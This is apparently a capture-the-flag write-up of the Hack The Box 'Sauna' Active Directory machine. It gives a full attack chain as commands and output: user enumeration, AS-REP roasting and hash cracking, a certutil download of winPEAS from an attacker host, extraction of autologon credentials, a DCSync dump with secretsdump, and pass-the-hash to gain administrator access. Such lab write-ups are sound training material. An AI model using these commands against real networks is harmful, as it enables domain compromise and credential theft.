Sauna CTF HTB
Hi what’s up, welcome to my page. Today we are going to solve Sauna ctf in Hack The box. This ctf is about Active Directory, which is very important.
Enumeration
nmap -sV -sC 10.129.95.180 Starting Nmap 7.98 ( https://nmap.org ) at 2026–07–03 13:16 -0400 Nmap scan report for 10.129.95.180 Host is up (0.21s latency). Not shown: 987 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026–07–04 00:16:58Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026–07–04T00:17:20 |_ start_date: N/A |_clock-skew: 6h59m50s | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required
As we can see, we have LDAP, evil-winrm, smb,http, rpc and many more ports.
RPC port
rpcclient -U "" -N 10.129.95.180 rpcclient $> enumdomusers result was NT_STATUS_ACCESS_DENIED rpcclient $> ^C
We can’t use rpc port without authentication.
SMB port
`smbclient -L //10.129.95.180
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
- - - - - - - - - - -
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.95.180 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 - no workgroup available`
Same thing.
LDAP We have port 88 and 636. That’s why we can use ldapsearch for domain enumeration. Let’s start it.
`ldapsearch -x -H ldap://10.129.95.180 -s base -b "" "(objectClass=*)" namingContexts
# extended LDIF
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: namingContexts
#
#
dn:
namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1`
Domain Controller- egotistical-bank.local. And there are no interesting things.
KERBEROS Port 88 is active, we can use kerbrute tool for enumerate authenticated users. I’m using seclist for usernames but you can use any userlist txt.
./kerbrute userenum -d egotistical-bank.local --dc 10.129.95.180 /home/kali/Downloads/SecLists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/03/26 - Ronnie Flathers @ropnop
2026/07/03 13:31:29 > Using KDC(s):
2026/07/03 13:31:29 > 10.129.95.180:88
2026/07/03 13:32:09 > [+] VALID USERNAME: administrator@egotistical-bank.local
2026/07/03 13:35:45 > [+] VALID USERNAME: hsmith@egotistical-bank.local
2026/07/03 13:36:30 > [+] VALID USERNAME: Administrator@egotistical-bank.local
2026/07/03 13:38:47 > [+] VALID USERNAME: fsmith@egotistical-bank.local
2026/07/03 13:58:42 > [+] VALID USERNAME: Fsmith@egotistical-bank.local
We found 3 users.
AES-ROASTING For these users, we can use impacket script called GetNPUusers.py. This script allowed us to find hashes.
GetNPUsers.py 'egotistical-bank.local/' -usersfile /home/kali/Downloads/sauna.txt -format hashcat -outputfile saunaasrep.txt -dc-ip 10.129.95.180
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'GetNPUsers.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd
We got fsmith’s hash.
Cracking the hash Hashcat help us to crack this hash.
hashcat -m 18200 saunaasrep.txt /usr/share/wordlists/rockyou.txt --force $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd:Thestrokes23
We found fsmith’s password.
Gaining access to evil-winrm | PORT 5985
evil-winrm -i <ip> -u <username> -p <password>
evil-winrm -i 10.129.95.180 -u fsmith -p Thestrokes23
Evil-WinRM shell v3.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/3/2026 5:14 PM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
*******
We got user.txt in desktop directory.
Privilege Escalation Firstly,we should upload winpeas on the victim machine for privilege escalation methods.
On attacker machine
Make sure you are supposed to be in directory which has winpeas inside.
python3 -m http.server 80
On victim machine
certutil -urlcache -split -f http://<ATTACKER_IP>:80/winPEAS.exe winPEAS.exe
We can run winpeas with .\winpeas.exe
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
And there it is autologon user:svc_loanmanager
BloodHound
Take a look at bloodhound,and we can understood what loanmanager can do. loanmanager have 3 permissions: GetChangesAll, DCSync, GetChanges.
We use secretsdump for administrator hash.
`
`console
`secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
**import**('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'secretsdump.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[_] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[_] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Hash has been found but firstly we should make sure that we can login with this hash. So we use crackmapexec for prove.
`crackmapexec smb 10.129.95.180 -u 'Administrator' --hash aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\Administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)
`Yeppp, we can use this hash for login!
**ROOT FLAG**
`>`impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e -dc-ip 10.129.95.180 Administrator@10.129.95.180
> C:\Users> cd Administrator
>
> C:\Users\Administrator> cd Desktop
>
> C:\Users\Administrator\Desktop> dir
> Volume in drive C has no label.
> Volume Serial Number is 489C-D8FC
> Directory of C:\Users\Administrator\Desktop
> 07/14/2021 03:35 PM
>
> .
> 07/14/2021 03:35 PM ..
> 07/03/2026 05:14 PM 34 root.txt
> 1 File(s) 34 bytes
> 2 Dir(s) 7,812,263,936 bytes free
> C:\Users\Administrator\Desktop> type root.txt
> *********``
> BINGOOO!!!! We got root flag. Stay safe and goodbye.
Discussion in the ATmosphere